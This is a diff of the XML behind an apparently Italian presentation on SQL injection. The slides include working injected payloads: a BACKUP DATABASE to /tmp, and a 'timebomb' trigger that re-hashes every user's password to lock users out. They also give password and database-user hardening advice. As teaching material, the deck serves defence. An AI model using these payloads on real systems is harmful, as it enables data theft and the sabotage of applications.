+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>	Id, Title, StartDate, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>EndDate</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>, Result, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>UserId</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>FROM </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>dbo.Courses</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>WHERE </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>UserId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t> = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="accent1"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>{</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="accent5">
+                    <a:lumMod val="60000"/>
+                    <a:lumOff val="40000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>userId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="accent1"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>}</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>	AND Title LIKE '%</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>'; BACKUP DATABASE [model] TO  DISK = N'/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>tmp</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>/AdventureWorksDW2022.bak' WITH NOFORMAT, INIT,  NAME = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>N'hasta</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>-la-vista-baby', SKIP, NOREWIND, NOUNLOAD,  STATS = 10;--</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>%' ORDER BY StartDate;</a:t>
+            </a:r>
+            <a:endParaRPr sz="1400" dirty="0">
+              <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3115626216"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide37.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 127">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24C9EF8A-9556-41D5-AB4B-3535574EA68D}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="128" name="Google Shape;128;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{350EB5A3-D931-1FA3-A0AE-0BC0E14F0961}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1290150" y="1454970"/>
+            <a:ext cx="6563700" cy="572700"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr lvl="0" algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
+              <a:t>Rendere</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
+              <a:t>inutilizzabile</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
+              <a:t>l’applicazione</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" dirty="0"/>
+              <a:t> (timebomb)</a:t>
+            </a:r>
+            <a:endParaRPr sz="2800" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="129" name="Google Shape;129;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{052C6432-ED89-354B-D6CF-496AACC4C193}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr preferRelativeResize="0"/>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:alphaModFix/>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4116500" y="448013"/>
+            <a:ext cx="911000" cy="911000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="130" name="Google Shape;130;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64656B3C-70FE-D695-1CB7-59C5CE6DD46F}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1128450" y="2195169"/>
+            <a:ext cx="6887100" cy="2292051"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="127000" lvl="0">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:buClr>
+                <a:srgbClr val="D93232"/>
+              </a:buClr>
+              <a:buSzPts val="1600"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>SELECT</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>	Id, Title, StartDate, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>EndDate</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>, Result, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>UserId</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>FROM </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>dbo.Courses</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>WHERE </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>UserId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t> = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="accent1"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>{</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="accent5">
+                    <a:lumMod val="60000"/>
+                    <a:lumOff val="40000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>userId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="accent1"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>}</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>	AND Title LIKE '%</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>'; EXEC('CREATE TRIGGER T ON </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>dbo.VersionInfo</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t> AFTER INSERT AS UPDATE </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>dbo.Users</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t> SET Password = HASHBYTES(''SHA2_256'', Password)');--</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>%' ORDER BY StartDate;</a:t>
+            </a:r>
+            <a:endParaRPr sz="1400" dirty="0">
+              <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2719288849"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide38.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 127">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
               <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DCF0E6B-8D63-563B-DC82-D5B8ACDC032D}"/>
             </a:ext>
           </a:extLst>
@@ -19597,7 +23353,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide31.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide39.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -19907,7 +23663,577 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide32.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide4.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 118"/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="119" name="Google Shape;119;p30"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2472833" y="1497613"/>
+            <a:ext cx="4198334" cy="572700"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en" dirty="0"/>
+              <a:t>Una buona password…</a:t>
+            </a:r>
+            <a:endParaRPr dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="120" name="Google Shape;120;p30"/>
+          <p:cNvPicPr preferRelativeResize="0"/>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:alphaModFix/>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4116500" y="448013"/>
+            <a:ext cx="911000" cy="911000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="121" name="Google Shape;121;p30"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1128450" y="2182797"/>
+            <a:ext cx="6887100" cy="2243867"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="457200" lvl="0" indent="-330200" algn="l" rtl="0">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClr>
+                <a:srgbClr val="D93232"/>
+              </a:buClr>
+              <a:buSzPts val="1600"/>
+              <a:buFont typeface="Barlow Condensed"/>
+              <a:buChar char="●"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0"/>
+              <a:t>8+ </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
+              <a:t>caratteri</a:t>
+            </a:r>
+            <a:endParaRPr sz="1600" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" lvl="0" indent="-330200" algn="l" rtl="0">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClr>
+                <a:srgbClr val="D93232"/>
+              </a:buClr>
+              <a:buSzPts val="1600"/>
+              <a:buFont typeface="Barlow Condensed"/>
+              <a:buChar char="●"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en" sz="1600" dirty="0"/>
+              <a:t>Lettere minuscole e maiuscole</a:t>
+            </a:r>
+            <a:endParaRPr sz="1600" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" lvl="0" indent="-330200" algn="l" rtl="0">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClr>
+                <a:srgbClr val="D93232"/>
+              </a:buClr>
+              <a:buSzPts val="1600"/>
+              <a:buChar char="●"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en" sz="1600" dirty="0"/>
+              <a:t>Numeri</a:t>
+            </a:r>
+            <a:endParaRPr sz="1600" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" lvl="0" indent="-330200">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:buClr>
+                <a:srgbClr val="D93232"/>
+              </a:buClr>
+              <a:buSzPts val="1600"/>
+              <a:buChar char="●"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
+              <a:t>Caratteri</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
+              <a:t>speciali</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1600" dirty="0"/>
+            </a:br>
+            <a:endParaRPr sz="1600" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="FF0000"/>
+              </a:solidFill>
+              <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide40.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 118">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{850BBD45-A471-DD73-E4BE-769F8739B001}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="119" name="Google Shape;119;p30">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74860291-D15F-DA8C-1E61-737506D410EB}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1893525" y="1490741"/>
+            <a:ext cx="5356950" cy="572700"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en" dirty="0"/>
+              <a:t>Altri accorgimenti: utente dedicato</a:t>
+            </a:r>
+            <a:endParaRPr dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="120" name="Google Shape;120;p30">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4330DDB9-4EC3-C315-E7AE-E0A149A4259C}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr preferRelativeResize="0"/>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
